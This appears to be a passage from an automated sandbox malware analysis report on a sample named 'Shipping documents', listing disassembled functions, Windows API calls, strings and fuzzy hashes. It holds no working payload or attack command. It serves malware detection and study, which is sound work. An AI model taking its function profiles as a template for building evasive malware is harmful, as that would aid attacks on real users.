                                                                                                          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                          Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00464B28
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                          • _wcslen.LIBCMT ref: 00464C28
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                          • _wcslen.LIBCMT ref: 00464CBA
                                                                                                          • _wcslen.LIBCMT ref: 00464CD0
                                                                                                          • _wcslen.LIBCMT ref: 00464CEF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$Directory$CurrentSystem
                                                                                                          • String ID: D
                                                                                                          • API String ID: 1914653954-2746444292
                                                                                                          • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                                                          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                          • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                                                          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                          Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                          • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                          • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                          • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                          • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1153243558-438819550
                                                                                                          • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                          • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                          • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                          • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                          Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll
                                                                                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                          • API String ID: 3832890014-4202584635
                                                                                                          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                          Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                          • GetFocus.USER32 ref: 0046A0DD
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$CtrlFocus
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1534620443-4108050209
                                                                                                          • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                                                          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                          • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                                                          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                          Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateDestroy
                                                                                                          • String ID: ,$tooltips_class32
                                                                                                          • API String ID: 1109047481-3856767331
                                                                                                          • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                          • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                          • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                          • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                          Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                          • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                          • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                          • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                          • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                          • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                          • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                          • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                          • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                          • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1441871840-4108050209
                                                                                                          • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                          • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                          • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                          • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                          Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                          • API String ID: 3631882475-2268648507
                                                                                                          • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                          • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                          • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                          • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                          Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                          • SendMessageW.USER32 ref: 00471740
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                          • SendMessageW.USER32 ref: 0047184F
                                                                                                          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                          • String ID:
                                                                                                          • API String ID: 4116747274-0
                                                                                                          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                          Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                          • _wcslen.LIBCMT ref: 00461683
                                                                                                          • __swprintf.LIBCMT ref: 00461721
                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                          • GetParent.USER32(?), ref: 004618C3
                                                                                                          • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                          • String ID: %s%u
                                                                                                          • API String ID: 1899580136-679674701
                                                                                                          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                          Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoItemMenu$Sleep
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1196289194-4108050209
                                                                                                          • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                          • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                          Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 0043143E
                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                          • String ID: (
                                                                                                          • API String ID: 3300687185-3887548279
                                                                                                          • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                                                                          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                          • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
